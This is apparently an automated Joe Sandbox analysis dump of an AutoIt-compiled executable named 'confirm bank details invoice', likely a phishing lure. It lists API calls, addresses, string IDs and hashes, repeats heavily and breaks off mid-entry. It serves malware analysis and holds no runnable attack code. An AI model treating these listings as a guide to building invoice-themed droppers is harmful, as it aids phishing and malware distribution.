                    • _wcscmp.LIBCMT ref: 004AD248
                    • GetWindowTextW.USER32(?,?,00000400), ref: 004AD26E
                    • _wcscmp.LIBCMT ref: 004AD282
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                    • String ID: %s%u
                    • API String ID: 3119225716-679674701
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 004AD8EB
                    • _wcscmp.LIBCMT ref: 004AD8FC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 004AD924
                    • CharUpperBuffW.USER32(?,00000000), ref: 004AD941
                    • _wcscmp.LIBCMT ref: 004AD95F
                    • _wcsstr.LIBCMT ref: 004AD970
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004AD9A8
                    • _wcscmp.LIBCMT ref: 004AD9B8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 004AD9DF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004ADA28
                    • _wcscmp.LIBCMT ref: 004ADA38
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 004ADA60
                    • GetWindowRect.USER32(00000004,?), ref: 004ADAC9
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    APIs
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    APIs
                    • LoadIconW.USER32(00000063), ref: 004AEAB0
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004AEAC2
                    • SetWindowTextW.USER32(?,?), ref: 004AEAD9
                    • GetDlgItem.USER32(?,000003EA), ref: 004AEAEE
                    • SetWindowTextW.USER32(00000000,?), ref: 004AEAF4
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEB04
                    • SetWindowTextW.USER32(00000000,?), ref: 004AEB0A
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004AEB2B
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004AEB45
                    • GetWindowRect.USER32(?,?), ref: 004AEB4E
                    • SetWindowTextW.USER32(?,?), ref: 004AEBB9
                    • GetDesktopWindow.USER32 ref: 004AEBBF
                    • GetWindowRect.USER32(00000000), ref: 004AEBC6
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004AEC12
                    • GetClientRect.USER32(?,?), ref: 004AEC1F
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004AEC44
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004AEC6F
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 004C79C6
                    • LoadCursorW.USER32(00000000,00007F00), ref: 004C79D1
                    • LoadCursorW.USER32(00000000,00007F03), ref: 004C79DC
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 004C79E7
                    • LoadCursorW.USER32(00000000,00007F01), ref: 004C79F2
                    • LoadCursorW.USER32(00000000,00007F81), ref: 004C79FD
                    • LoadCursorW.USER32(00000000,00007F88), ref: 004C7A08
                    • LoadCursorW.USER32(00000000,00007F80), ref: 004C7A13
                    • LoadCursorW.USER32(00000000,00007F86), ref: 004C7A1E
                    • LoadCursorW.USER32(00000000,00007F83), ref: 004C7A29
                    • LoadCursorW.USER32(00000000,00007F85), ref: 004C7A34
                    • LoadCursorW.USER32(00000000,00007F82), ref: 004C7A3F
                    • LoadCursorW.USER32(00000000,00007F84), ref: 004C7A4A
                    • LoadCursorW.USER32(00000000,00007F04), ref: 004C7A55
                    • LoadCursorW.USER32(00000000,00007F02), ref: 004C7A60
                    • LoadCursorW.USER32(00000000,00007F89), ref: 004C7A6B
                    • GetCursorInfo.USER32(?), ref: 004C7A7B
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    APIs
                      • Part of subcall function 0048E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0047C8B7,?,00002000,?,?,00000000,?,0047419E,?,?,?,0050DC00), ref: 0048E984
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                    • __wsplitpath.LIBCMT ref: 0047C93E
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscpy.LIBCMT ref: 0047C953
                    • _wcscat.LIBCMT ref: 0047C968
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0047C978
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0047CABE
                      • Part of subcall function 0047B337: _wcscpy.LIBCMT ref: 0047B36F
                    Similarity
                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 2258743419-1018226102
                    APIs
                    • _memset.LIBCMT ref: 004DCEFB
                    • DestroyWindow.USER32(?,?), ref: 004DCF73
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004DCFF4
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004DD016
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004DD025
                    • DestroyWindow.USER32(?), ref: 004DD042
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00470000,00000000), ref: 004DD075
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004DD094
                    • GetDesktopWindow.USER32 ref: 004DD0A9
                    • GetWindowRect.USER32(00000000), ref: 004DD0B0
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004DD0C2
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004DD0DA
                      • Part of subcall function 0048B526: GetWindowLongW.USER32(?,000000EB), ref: 0048B537
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 3877571568-3619404913
                    • Opcode ID: e907a54fbc5ae12743c062df0b20446d1ddaf915846ebb2b2dcecb434641a549
                    • Instruction ID: 545c0b12c1f4776674ee31aa2e6a8d24ee79ff44de788c64283a3cf59b71ebfd
                    • Opcode Fuzzy Hash: e907a54fbc5ae12743c062df0b20446d1ddaf915846ebb2b2dcecb434641a549
                    • Instruction Fuzzy Hash: 7A71CD70540205AFE721CF28CC95FAA7BE5EB89708F04451EF985873A1C738E946DB1A
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DragQueryPoint.SHELL32(?,?), ref: 004DF37A
                      • Part of subcall function 004DD7DE: ClientToScreen.USER32(?,?), ref: 004DD807
                      • Part of subcall function 004DD7DE: GetWindowRect.USER32(?,?), ref: 004DD87D
                      • Part of subcall function 004DD7DE: PtInRect.USER32(?,?,004DED5A), ref: 004DD88D
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DF3E3
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004DF3EE
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004DF411
                    • _wcscat.LIBCMT ref: 004DF441
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004DF458
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DF471
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 004DF488
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 004DF4AA
                    • DragFinish.SHELL32(?), ref: 004DF4B1
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004DF59C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: edc42fc195a9a0418b19d12bc8afcdb085d4cc1245f69d3f19ce618713b31924
                    • Instruction ID: 5be0a7568a0cdd213812fba216a2cffca629654862301c03845100e5d656c52e
                    • Opcode Fuzzy Hash: edc42fc195a9a0418b19d12bc8afcdb085d4cc1245f69d3f19ce618713b31924
                    • Instruction Fuzzy Hash: DF615771508300AFC311EF65DC85EAFBBE8FF89714F004A2EB595922A1DB749A09CB56
                    APIs
                    • VariantInit.OLEAUT32(00000000), ref: 004BAB3D
                    • VariantCopy.OLEAUT32(?,?), ref: 004BAB46
                    • VariantClear.OLEAUT32(?), ref: 004BAB52
                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004BAC40
                    • __swprintf.LIBCMT ref: 004BAC70
                    • VarR8FromDec.OLEAUT32(?,?), ref: 004BAC9C
                    • VariantInit.OLEAUT32(?), ref: 004BAD4D
                    • SysFreeString.OLEAUT32(00000016), ref: 004BADDF
                    • VariantClear.OLEAUT32(?), ref: 004BAE35
                    • VariantClear.OLEAUT32(?), ref: 004BAE44
                    • VariantInit.OLEAUT32(00000000), ref: 004BAE80
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                    • API String ID: 3730832054-3931177956
                    • Opcode ID: a7a1644efff19318b4a2fcf1fac99f336e373ae00e2a4feb4414b21a6ef3c27f
                    • Instruction ID: 6cc678c61f45ea4a9c9da8c8747f259c559654c56aacbd11086e7ec6f9d1f75f
                    • Opcode Fuzzy Hash: a7a1644efff19318b4a2fcf1fac99f336e373ae00e2a4feb4414b21a6ef3c27f
                    • Instruction Fuzzy Hash: 72D1C131A04105DBCB109F6AC485BEEB7B5BF04700F18845BE5159B281DB78EC65DBBA
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 004D71FC
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D7247
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 60a27181bc177b2f66fcf92f2fe6d939c819fb6ea7898c311e0addd944f088ad
                    • Instruction ID: 8b02e241c4c2adc3d3d82137b597020baa80529be4bde69492112215ba16c2c8
                    • Opcode Fuzzy Hash: 60a27181bc177b2f66fcf92f2fe6d939c819fb6ea7898c311e0addd944f088ad
                    • Instruction Fuzzy Hash: E1913E346086419BCB05EF11C491A6EBBA1BF55318F00885FFC9A5B393DB38ED46CB99
                    APIs
                    • EnumChildWindows.USER32(?,004ACF50), ref: 004ACE90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: 4+R$CLASS$CLASSNN$H+R$INSTANCE$L+R$NAME$P+R$REGEXPCLASS$T+R$TEXT
                    • API String ID: 3555792229-2236777132
                    • Opcode ID: 109b8ab422950ded6e969c399c5b83cd3561e8302bc833092e6e892ad79f2c71
                    • Instruction ID: dc377302aa681af9824ba358c83dc9f9f9a6d722fa6ae5babbb328f3e0b15a80
                    • Opcode Fuzzy Hash: 109b8ab422950ded6e969c399c5b83cd3561e8302bc833092e6e892ad79f2c71
                    • Instruction Fuzzy Hash: 9791A330900506ABDB58EF61C4C1BEBFBB5BF16304F50851BD449A7291DF38695AC7E8
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004DE5AB
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004DBEAF), ref: 004DE607
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE647
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE68C
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE6C3
                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,004DBEAF), ref: 004DE6CF
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004DE6DF
                    • DestroyIcon.USER32(?,?,?,?,?,004DBEAF), ref: 004DE6EE
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004DE70B
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004DE717
                      • Part of subcall function 00490FA7: __wcsicmp_l.LIBCMT ref: 00491030
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 951ccba9af6c5416c6cf62432b995b82b4461d40c4aa4234771e109eec42284e
                    • Instruction ID: c2c6e9ca0dcbe67d5b9460f00a8f930b2bc5c9b365ce407a880bb4ddb6a9e6b6
                    • Opcode Fuzzy Hash: 951ccba9af6c5416c6cf62432b995b82b4461d40c4aa4234771e109eec42284e
                    • Instruction Fuzzy Hash: AB61D071900215BAEB14EF65CC52FBE7BA8BB08714F104117F915DA2D0EB78D990CB68
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CharLowerBuffW.USER32(?,?), ref: 004BD292
                    • GetDriveTypeW.KERNEL32 ref: 004BD2DF
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD327
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD35E
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD38C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 1148790751-4113822522
                    • Opcode ID: b465b8926753d12975c5c4d5d2aba6ecc35dc4fda4ce14c6ee665361c9046bfc
                    • Instruction ID: f9a5065fced3058ae8c3b70fa832dd90b56177f191cb26ad000db76ab86ab97d
                    • Opcode Fuzzy Hash: b465b8926753d12975c5c4d5d2aba6ecc35dc4fda4ce14c6ee665361c9046bfc
                    • Instruction Fuzzy Hash: 1D516D715047049FC700EF11D8819AEB7E5FF99718F00886EF88967291DB39EE06CB96
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,004E3973,00000016,0000138C,00000016,?,00000016,0050DDB4,00000000,?), ref: 004B26F1
                    • LoadStringW.USER32(00000000,?,004E3973,00000016), ref: 004B26FA
                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,004E3973,00000016,0000138C,00000016,?,00000016,0050DDB4,00000000,?,00000016), ref: 004B271C
                    • LoadStringW.USER32(00000000,?,004E3973,00000016), ref: 004B271F
                    • __swprintf.LIBCMT ref: 004B276F
                    • __swprintf.LIBCMT ref: 004B2780
                    • _wprintf.LIBCMT ref: 004B2829
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004B2840
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                    • API String ID: 618562835-2268648507
                    • Opcode ID: 721716dee0997fb61a9ac38399f5e930ead809b7031ed543b5d251feb62088df
                    • Instruction ID: 7465dea8e0e59044fed4710f326115892c0c2c21089ff7cd2b95d85b6b40f863
                    • Opcode Fuzzy Hash: 721716dee0997fb61a9ac38399f5e930ead809b7031ed543b5d251feb62088df
                    • Instruction Fuzzy Hash: 80417172800219BACB14FBD1DE82DEEB778EF15348F50446EB50576092DB786F09CBA8
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004BD0D8
                    • __swprintf.LIBCMT ref: 004BD0FA
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004BD137
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004BD15C
                    • _memset.LIBCMT ref: 004BD17B
                    • _wcsncpy.LIBCMT ref: 004BD1B7
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004BD1EC
                    • CloseHandle.KERNEL32(00000000), ref: 004BD1F7
                    • RemoveDirectoryW.KERNEL32(?), ref: 004BD200
                    • CloseHandle.KERNEL32(00000000), ref: 004BD20A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 07a3e164b6d055d510c4cd8f0ff01309e65754d82333c3b51c03cd6355342179
                    • Instruction ID: 7e4af3f02914fc5544549279a2a71eb5ed70174fdd4c28acc366bf616c3e6eee
                    • Opcode Fuzzy Hash: 07a3e164b6d055d510c4cd8f0ff01309e65754d82333c3b51c03cd6355342179
                    • Instruction Fuzzy Hash: 04318EB290010AABDB21DFA5DC49FEB37BDAF89704F1040FAF909D2160E77496558B38
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004DBEF4,?,?), ref: 004DE754
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE76B
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE776
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE783
                    • GlobalLock.KERNEL32(00000000), ref: 004DE78C
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE79B
                    • GlobalUnlock.KERNEL32(00000000), ref: 004DE7A4
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE7AB
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE7BC
                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004FD9BC,?), ref: 004DE7D5
                    • GlobalFree.KERNEL32(00000000), ref: 004DE7E5
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DE809
                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004DE834
                    • DeleteObject.GDI32(00000000), ref: 004DE85C
                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004DE872
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                    • String ID:
                    • API String ID: 3840717409-0
                    • Opcode ID: 96b0e4f4940fe8109d5656012a93dced3252e114a7eb37a8fba5c3c1928f3372
                    • Instruction ID: 66e248685489436d9468ab7f5bc6aa2ca0997f6bd1f99ecd8ed03b69822da44b
                    • Opcode Fuzzy Hash: 96b0e4f4940fe8109d5656012a93dced3252e114a7eb37a8fba5c3c1928f3372
                    • Instruction Fuzzy Hash: B3414975A00204EFDB11AF65CC88EAF7BBAEF89715F104069F906DB2A0C7349951DB64
                    APIs
                    • __wsplitpath.LIBCMT ref: 004C076F
                    • _wcscat.LIBCMT ref: 004C0787
                    • _wcscat.LIBCMT ref: 004C0799
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C07AE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C07C2
                    • GetFileAttributesW.KERNEL32(?), ref: 004C07DA
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004C07F4
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0806
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: b04d8c39aec038c2ad2e1c75788a0ba59bca94d93353ffb525f81311dfca258e
                    • Instruction ID: 256ce6c4302a6755781ff85d4b0fa33ba37de7b76564d27fa35383080705dc73
                    • Opcode Fuzzy Hash: b04d8c39aec038c2ad2e1c75788a0ba59bca94d93353ffb525f81311dfca258e
                    • Instruction Fuzzy Hash: 28817075604301DFCBA4EF64C445E6FB7E8AB88314F14882FF889C7251E738E9558B9A
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004DEF3B
                    • GetFocus.USER32 ref: 004DEF4B
                    • GetDlgCtrlID.USER32(00000000), ref: 004DEF56
                    • _memset.LIBCMT ref: 004DF081
                    • GetMenuItemInfoW.USER32 ref: 004DF0AC
                    • GetMenuItemCount.USER32(00000000), ref: 004DF0CC
                    • GetMenuItemID.USER32(?,00000000), ref: 004DF0DF
                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 004DF113
                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 004DF15B
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004DF193
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004DF1C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
